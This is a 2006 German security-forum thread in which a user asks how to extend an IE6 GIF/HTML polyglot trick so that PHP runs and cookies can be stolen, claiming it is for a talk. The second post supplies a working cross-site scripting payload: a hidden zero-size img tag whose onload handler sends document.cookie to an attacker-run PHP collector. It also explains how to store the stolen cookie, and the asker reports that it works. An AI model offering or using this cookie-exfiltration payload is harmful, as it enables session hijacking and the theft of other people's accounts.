<GIF89aŸ8÷™fÿ™™> Exploit + php code ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von hacker5, 13. März 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 13. März 2006
    Hi ich hab auch mal ne frage ^^

    also ich denke mal jeder kennt das IE 6 Exploit.

    So meine frage ist jetzt , ist es möglich php code mit in der .gif ausrufen zu lassen ?

    Also ich bin bis jetzt auf keine lösung gekommen :).

    Für die die das script nicht kennen:

    Code:
    <GIF89aŸ8÷™fÿ™™>
    
    <html>
    <head>
    <script>
    alert("sicherheitslücke");
    </script>
    </head>
    <body>
    </body>
    </html>
    
    nur ich denke mal wenn man es als .gif abruft ist es nicht möglich oder ?

    Also eigendlich müsste es ja gehen da man mit dem Exploit auch die cookies ggf, auslesen lassen kann .

    also wer ein tipp hat die ich php code darin abrufen kann immer her damit ^^..

    Vielen dank im vorraus.

    ps: nicht für illegale zwecke zu verwenden .... fürn vortrag :)
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 14. März 2006
    PHP Code wird nicht funktionieren, da der Code vom Browser nicht interpretiert würde.
    Jedoch um Cookies per Javascript zu verschicken:
    Code:
    <img src="http://www.google.de/images/hp0.gif" width="0"height="0" name="hia" onload="hia.src='http://deineseite/abfangscript.php?cookie='+document.cookie;">
    
    Erklärung:

    Ber Browser würde versuchen das Bild zu laden, jedoch wird als Quelle http://deineseite/abfangscript.php angegeben und hinten dran der aktuelle Cookie der Seite gehängt, auf der das Bild ist.
    Zudem wird das Bild dank width und height nicht angezeigt, da es 0x0 Pixel groß ist.

    Der Cookie wird also an das abfangscript.php gesendet und muss nurnoch per $_REQUEST[cookie] abgefangen und gespeichert werden.
     
  4. #3 14. März 2006
    Hi!

    Habe hierzu folgendes gefunden: Klick

    Da steht, man könne den Code, der von Iexplore ausgeführt werden kann einfügen, andererseits steht etwas weiter unten, dass man eine html-konforme Datei erstellen soll...

    Naja, vllt hilft es dir ja weiter.

    GreetZ, ~Br4inP4in~

    EDIT: Hm ok... XodoX war schneller ;)
     
  5. #4 14. März 2006
    vielen dank an xodox :) und ~Br4inP4in~

    ich werd es nachher dann mal ausprobieren :)

    hört sich aber rentabel an müsste funktionieren


    EDIT://

    @ xodox :D prima erklärt vielen dank :) da stellt sich meinem Vortrag nichts in den weg.

    klappt prima :)

    mit php kenn ich mich aus nur das fehle mir onload="hia.src=''

    habt beide eine 10 bekommen :)
     

  6. Videos zum Thema
Die Seite wird geladen...
Similar Threads - <GIF89aŸ8÷™fÿ™™> Exploit php
  1. Biete Eplus Internetdrossel Exploit

    THC-9 , 2. November 2015 , im Forum: Kleinanzeigen
    Antworten:
    2
    Aufrufe:
    917
  2. Antworten:
    2
    Aufrufe:
    484
  3. Antworten:
    0
    Aufrufe:
    1.672
  4. Antworten:
    7
    Aufrufe:
    1.569
  5. Antworten:
    17
    Aufrufe:
    3.899